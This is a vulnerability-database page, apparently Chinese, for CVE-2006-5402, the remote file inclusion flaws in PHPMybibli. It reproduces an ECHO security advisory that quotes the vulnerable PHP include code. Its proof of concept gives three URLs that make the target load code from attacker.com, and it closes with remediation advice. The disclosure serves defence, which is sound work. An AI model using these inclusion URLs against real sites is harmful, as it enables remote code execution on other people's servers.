PHPMybibli 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111316 漏洞类型 代码注入
发布时间 2006-10-17 更新时间 2006-10-24
CVE编号 CVE-2006-5402 CNNVD-ID CNNVD-200610-309
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2585
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-309
|漏洞详情
PHPmybibli3.0.1和更早版本中的多个PHP远程文件包含漏洞,远程攻击者可以通过(1)class_path,(2)javascript_path和(3)(a)cart.php的include_path参数;(4)(b)index.php的class_path参数;(5)(c)edit.php的javascript_path参数;(6)(d)circ.php的include_path参数;(e)select.php的不明参数;以及其他文件的不明参数中的URL来执行任意PHP代码。
|漏洞EXP
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_55$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_55$2006]Phpmybibli  <=2.1  Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author		: Dedi Dwianto a.k.a the_day
Date Found	: October, 17th 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv55-theday-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: PHPmybibli
version		: <=2.1
URL		: http://www.pizz.net/

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

I found vulnerability script cart.php
--------------------------cart.php---------------------------------------
....
<?

  include_once("$include_path/cart.inc.php");
  include_once("$include_path/templates/cart.tpl.php");
  include_once("$include_path/isbn.inc.php");
  include_once("$include_path/expl_info.inc.php");
  include_once("$include_path/bull_info.inc.php");
  include_once("$include_path/notice_authors.inc.php");
  include_once("$include_path/notice_categories.inc.php");
  include_once("$include_path/explnum.inc.php");
  include_once("$class_path/cart.class.php");
  include_once("$class_path/caddie.class.php");
  include_once("$class_path/author.class.php");
  include_once("$class_path/collection.class.php");
  include_once("$class_path/subcollection.class.php");
  include_once("$class_path/mono_display.class.php");
  include_once("$class_path/serie.class.php");
  include_once("$class_path/serial_display.class.php");
  include_once("$class_path/serials.class.php");
  include_once("$class_path/editor.class.php");
  require_once("$class_path/emprunteur.class.php");
  require_once("$javascript_path/misc.inc.php");
...
----------------------------------------------------------

Input passed to the "$include_path" parameter in cart.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

edit.php
circ.php
index.php
select.php
etc..

Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacker.com/inject.txt?

Solution:
~~~~~~

- Sanitize variable $class_path,$javascript_path,$include_path on affected files.
- Turn off register_globals


---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
     EcHo Research & Development Center
     the_day[at]echo[dot]or[dot]id
     
-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2006-10-17]
|参考资料

来源:BID
名称:20578
链接:http://www.securityfocus.com/bid/20578
来源:XF
名称:phpmybibli-includepath-file-include(29627)
链接:http://xforce.iss.net/xforce/xfdb/29627
来源:www.sigb.net
链接:http://www.sigb.net/patch.php
来源:VUPEN
名称:ADV-2006-4064
链接:http://www.frsirt.com/english/advisories/2006/4064
来源:BUGTRAQ
名称:20061017[ECHO_ADV_55$2006]Phpmybibli<=2.1MultipleRemoteFileInclusionVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116110988829381&w=2
来源:VIM
名称:20061019CVE-2006-5402,fishy?
链接:http://attrition.org/pipermail/vim/2006-October/001088.html
来源:VIM
名称:20061018CVE-2006-5402,fishy?
链接:http://attrition.org/pipermail/vim/2006-October/001087.html
来源:MISC
链接:http://advisories.echo.or.id/adv/adv55-theday-2006.txt